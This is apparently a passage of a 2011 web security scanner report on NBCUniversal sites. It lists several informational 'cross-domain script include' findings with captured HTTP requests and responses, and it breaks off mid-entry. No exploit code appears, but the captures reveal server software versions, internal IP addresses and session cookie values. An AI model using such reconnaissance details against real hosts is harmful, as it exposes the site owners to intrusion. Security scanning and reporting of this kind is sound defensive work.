http://html.aggregateknowledge.com/click/nocache/1229083889/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=901666&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D284429%26icid%3Dxsell http://html.aggregateknowledge.com/click/nocache/663047270/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=202826&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D110243%26icid%3Dxsell http://html.aggregateknowledge.com/click/nocache/872334866/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=201183&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D83119%26icid%3Dxsell http://images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif http://nbc.com/ http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js http://s7.addthis.com/js/250/addthis_widget.js http://twitter.com/nbcstore http://widget.nbc.com/videos/nbcshort_at.swf?CXNID=1000004.10045NXC&widID=4727a250e66f9723&clipID=1289957&showID=22&configXML=http%3A%2F%2Fwww.nbc.com%2Fservice%2Fvideowidget%2Fparams%2FdmlkZW9faWQ9MTI4OTk1Nw%3D%3D%2F&initXML=http://www.nbc.com%2FThe_Office%2Fvideo%2Fepisodes%2Finit.xml?videoId=1289957 http://www.addthis.com/bookmark.php?v=250&username=deliveryagent http://www.deliveryagent.com/ http://www.facebook.com/pages/NBC-Universal-Store/27590173208 http://www.nbcuni.com/ https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com
Request
GET /the-office-dundie-award/detail.php?p=44960&v=nbc_the-office HTTP/1.1 Host: www.nbcuniversalstore.com Proxy-Connection: keep-alive Referer: http://www.nbcuniversalstore.com/?v=nbc_the-office User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SESSID=faa2b376751236c89d563cadebeadde6; DASHORTNAME=nbcuniversalstore; DAABTEST=B; WRUID=0; s_pers=%20gpv_pageName%3DNBCUniversal%2520Store%253ANBCUniversal%2520Store%253ANBC%253AThe%2520Office%253ACategory%7C1313448476137%3B; s_sess=%20s_cc%3Dtrue%3B%20s_eVar2%3Dnbcu_homepage_flash_the-office_show_button%3B%20s_sq%3Ddelagentnbc%252Cdelagentglobalrollup%253D%252526pid%25253DNBCUniversal%25252520Store%2525253ANBCUniversal%25252520Store%2525253ANBC%2525253AThe%25252520Office%2525253ACategory%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.nbcuniversalstore.com/%2525253Fv%2525253Dnbc_the-office%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Apache Vary: Accept-Encoding Content-Length: 163119 Content-Type: text/html Expires: Mon, 15 Aug 2011 22:17:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 15 Aug 2011 22:17:58 GMT Connection: close Set-Cookie: DACART=deleted; expires=Sun, 15-Aug-2010 22:17:57 GMT; path=/; domain=nbcuniversalstore.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...[SNIP]... <link href="/nbcuniversalstore/layout/slimbox.css?v=24" type="text/css" rel="stylesheet" /> <link rel="stylesheet" href="http://assets.resultspage.com/autosuggest/autosuggest.css" media="screen" type="text/css"> <link href="/nbcuniversalstore/layout/nbc/nbc.css?v=24" type="text/css" rel="stylesheet" />...[SNIP]... </script> <script src="http://connect.facebook.net/en_US/all.js#xfbml=1"> </script>...[SNIP]... <div id="userMenu" > <a href="http://twitter.com/nbcstore" target="_blank" id="twitter"> <span class="socialize">...[SNIP]... </a><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank" id="facebook"> <span class="socialize">...[SNIP]... </a> <a href="http://NBC.com/" target="_blank" class="partnerlink "> Visit <img src="/nbcuniversalstore/layout/nbc/partnerLogo.gif" />...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=5;sz=246x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=5;sz=246x100;ord=1313446678?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;view=michael;tile=6;sz=726x100;ord=1313446678?" border="0" alt="" /> </a>...[SNIP]... <div id="contentHolder"> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <div class="addthis_toolbox addthis_default_style"> <a href="http://www.addthis.com/bookmark.php?v=250&username=deliveryagent" class="addthis_button last"> <img src="/nbcuniversalstore/layout/ico_addshare.gif" width="16" height="16" border="0" alt="" />...[SNIP]... </script> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=deliveryagent"> </script>...[SNIP]... <param name="quality" value="high" /><embed src="http://widget.nbc.com/videos/nbcshort_at.swf?CXNID=1000004.10045NXC&widID=4727a250e66f9723&clipID=1289957&showID=22&configXML=http%3A%2F%2Fwww.nbc.com%2Fservice%2Fvideowidget%2Fparams%2FdmlkZW9faWQ9MTI4OTk1Nw%3D%3D%2F&initXML=http://www.nbc.com%2FThe_Office%2Fvideo%2Fepisodes%2Finit.xml?videoId=1289957" quality="high" bgcolor="#000000" width="384" height="283" allowFullScreen="true" align="middle" allowScriptAccess="always" type="application/x-shockwave-flash"> </embed>...[SNIP]... <li> <a href="http://html.aggregateknowledge.com/click/nocache/872334866/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=201183&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D83119%26icid%3Dxsell" class="image"> <img src="/img/product/resized/723/00083119-871723_catl_50.jpg?k=fd222912&pid=83119&s=catl" alt="The Office Dwight Workshirt T-Shirt" /></a> <a href="http://html.aggregateknowledge.com/click/nocache/872334866/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=201183&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D83119%26icid%3Dxsell" class="name"> The Office Dwight Workshirt T-Shirt</a> <a href="http://html.aggregateknowledge.com/click/nocache/872334866/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=201183&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D83119%26icid%3Dxsell" class="price"> $25.00<!-- IE6 -->...[SNIP]... <li> <a href="http://html.aggregateknowledge.com/click/nocache/1229083889/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=901666&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D284429%26icid%3Dxsell" class="image"> <img src="/img/product/resized/900/00284429-208900_catl_50.jpg?k=8192cd1d&pid=284429&s=catl" alt="The Office Season 6 and The Office..." /></a> <a href="http://html.aggregateknowledge.com/click/nocache/1229083889/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=901666&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D284429%26icid%3Dxsell" class="name"> The Office Season 6 and The Office...</a> <a href="http://html.aggregateknowledge.com/click/nocache/1229083889/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=901666&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D284429%26icid%3Dxsell" class="price"> <strike>...[SNIP]... <li class="last"> <a href="http://html.aggregateknowledge.com/click/nocache/663047270/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=202826&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D110243%26icid%3Dxsell" class="image"> <img src="/img/product/resized/736/00110243-047736_catl_50.jpg?k=c3094e53&pid=110243&s=catl" alt="The Office Jim and Pam Heart Mug Set" /></a> <a href="http://html.aggregateknowledge.com/click/nocache/663047270/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=202826&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D110243%26icid%3Dxsell" class="name"> The Office Jim and Pam Heart Mug Set</a> <a href="http://html.aggregateknowledge.com/click/nocache/663047270/?id=d8defade-df80-4c26-8911-e92f41285a5f&impid=32&rid=94&l=en_US&itemid=202826&r=http%3A%2F%2Fwww.nbcuniversalstore.com%2Fdetail.php%3Fp%3D110243%26icid%3Dxsell" class="price"> $24.00<!-- IE6 -->...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678?" width=246 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=7;sz=246x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=7;sz=246x100;ord=1313446678?" border="0" alt="" /> </a>...[SNIP]... <div class="textPromo"> <iframe src="http://ad.doubleclick.net/adi/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678?" width=726 height=100 marginwidth="0" marginheight="0" frameborder="0" scrolling="no"> <script type="text/javascript" src="http://ad.doubleclick.net/adj/agt.nbcuni/nbc;tile=8;sz=726x100;abr=!ie;ord=1313446678?"> </script>...[SNIP]... <noscript><a href="http://ad.doubleclick.net/jump/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678?"> <img src="http://ad.doubleclick.net/ad/agt.nbcuni/nbc;tile=8;sz=726x100;ord=1313446678?" border="0" alt="" /> </a>...[SNIP]... <li class="facebook"><a href="http://www.facebook.com/pages/NBC-Universal-Store/27590173208"" target="_blank"> <img src="/nbcuniversalstore/layout/logo_facebook.gif" alt="Facebook Logo" />...[SNIP]... <li class="twitter"><a href="http://twitter.com/nbcstore" target="_blank"> <img src="/nbcuniversalstore/layout/logo_twitter.gif" alt="Twitter Logo" />...[SNIP]... <!-- START SCANALERT CODE --> <a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=secure.nbcuniversalstore.com"> <img width="115" height="32" border="0" src="//images.scanalert.com/meter/survey/secure.nbcuniversalstore.com/12.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;"> </a>...[SNIP]... <p id="companyCopy" style="font-size:11px;">©2011 <a href="http://www.nbcuni.com/"> NBCUniversal</a>...[SNIP]... <p id="daPower" style="margin-top:5px;">Powered by <a href="http://www.deliveryagent.com/" target="_blank"> <img src="/nbcuniversalstore/layout/logo_da.gif"alt="Delivery Agent" />...[SNIP]... </script><script language="JavaScript" src="http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </script> <noscript><img height="1" width="1" border="0" src="http://edge.aperture.displaymarketplace.com/audmeasure.gif?liveConClientID=4157529279552&PixelID=127&EventType=view&PageID=27"> </noscript>...[SNIP]... </script><script language="javascript" src="http://nbcuniversalstore.resultspage.com/autosuggest/searchbox_suggest_v1.js" type="text/javascript"> </script>...[SNIP]...
4. Cross-domain script include
previous
next
There are 19 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
4.1. http://www.nbcuni.com/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/
Issue detail
The response dynamically includes the following script from another domain:http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET / HTTP/1.1 Host: www.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Vary: Accept-Encoding Wirt: qw-p-wordpress03.qwplatform.com Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.182 80 Content-Length: 48835 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 15 Aug 2011 22:13:48 GMT Date: Mon, 15 Aug 2011 22:13:48 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]...
4.2. http://www.nbcuni.com/broadcast
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/broadcast
Issue detail
The response dynamically includes the following script from another domain:http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /broadcast HTTP/1.1 Host: www.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/ Cookie: s_cc=true; s_nr=1313446453781; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:14:17 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress01.qwplatform.com Content-Length: 14735 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.180 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:14:17 GMT Date: Mon, 15 Aug 2011 22:14:17 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]...
4.3. http://www.nbcuni.com/broadcast/nbc-universal-sports-olympics
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/broadcast/nbc-universal-sports-olympics
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://s7.addthis.com/js/250/addthis_widget.js http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /broadcast/nbc-universal-sports-olympics HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/broadcast User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446731921; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Broadcast%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fbroadcast%25252Fnbc-universal-sports-olympics%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:18:45 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 20133 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:18:46 GMT Date: Mon, 15 Aug 2011 22:18:46 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]... </span> <script src="http://connect.facebook.net/en_US/all.js" type="text/javascript"> </script>...[SNIP]... <div class="share-icons"> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=ankur79"> </script>...[SNIP]...
4.4. http://www.nbcuni.com/cable
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/cable
Issue detail
The response dynamically includes the following script from another domain:http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /cable HTTP/1.1 Host: www.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/ Cookie: s_cc=true; s_nr=1313446439435; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:14:07 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress01.qwplatform.com Content-Length: 18678 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.180 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:14:07 GMT Date: Mon, 15 Aug 2011 22:14:07 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]...
4.5. http://www.nbcuni.com/corporate
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/corporate
Issue detail
The response dynamically includes the following script from another domain:http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /corporate HTTP/1.1 Host: www.nbcuni.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/ Cookie: s_cc=true; s_nr=1313446439435; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724CD10851D0ED3-4000012BE00065E8[CE]
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Vary: Accept-Encoding Wirt: qw-p-wordpress03.qwplatform.com Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.182 80 Content-Length: 84057 Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Mon, 15 Aug 2011 22:14:01 GMT Date: Mon, 15 Aug 2011 22:14:01 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]...
4.6. http://www.nbcuni.com/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership
Issue detail
The response dynamically includes the following scripts from other domains:http://s7.addthis.com/js/250/addthis_widget.js http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /corporate/newsroom/major-league-soccer-and-nbc-sports-group-announce-multi-year-partnership HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://search.nbcuni.com/search?q=game User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446650249; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Search%252520Results%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fcorporate%25252Fnewsroom%25252Fmajor-league-soccer-and-nbc-sports-group-announce-multi-yea%2526ot%253DA
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:17:24 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 22224 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:17:24 GMT Date: Mon, 15 Aug 2011 22:17:24 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]... <div class="share-icons"> <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pub=ankur79"> </script>...[SNIP]...
4.7. http://www.nbcuni.com/digital
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/digital
Issue detail
The response dynamically includes the following script from another domain:http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /digital HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446613477; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.10 X-Powered-By: PHP/5.2.10 Pragma: no-cache X-Pingback: http://www.nbcuni.com/wordpress/xmlrpc.php Last-Modified: Mon, 15 Aug 2011 22:16:48 GMT Vary: Accept-Encoding Wirt: qw-p-wordpress02.qwplatform.com Content-Length: 13657 Content-Type: text/html; charset=UTF-8 Pool-Info: pool_wordpress_prod 66.77.88.181 80 Cache-Control: no-cache, must-revalidate Expires: Mon, 15 Aug 2011 22:16:48 GMT Date: Mon, 15 Aug 2011 22:16:48 GMT Connection: close <!DOCTYPE html> <html dir="ltr" lang="en-US"> <head> <meta charset="UTF-8" /> <script> var template_directory = 'http://www.nbcuni.com/wordpress/wp-content/themes/theme-nbcuni'; var widgetname = '';...[SNIP]... </script><script type="text/javascript" src="http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2"> </script>...[SNIP]...
4.8. http://www.nbcuni.com/digital/daily-candy
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.nbcuni.com
Path:
/digital/daily-candy
Issue detail
The response dynamically includes the following scripts from other domains:http://connect.facebook.net/en_US/all.js http://s7.addthis.com/js/250/addthis_widget.js http://serve.a-widget.com/kickFlash/scripts/swfobject2.js?2
Request
GET /digital/daily-candy HTTP/1.1 Host: www.nbcuni.com Proxy-Connection: keep-alive Referer: http://www.nbcuni.com/digital User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|271DF814851D048A-60000137600077B3[CE]; s_cc=true; s_nr=1313446725531; s_sq=nbcuglobal%2Cnbcucorporated%2Cnbcunbcuniversalbu%3D%2526pid%253DNBCUniversal%252520%25257C%252520Digital%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.nbcuni.com%25252Fdigital%25252Fdaily-candy%2526ot%253DA
Response
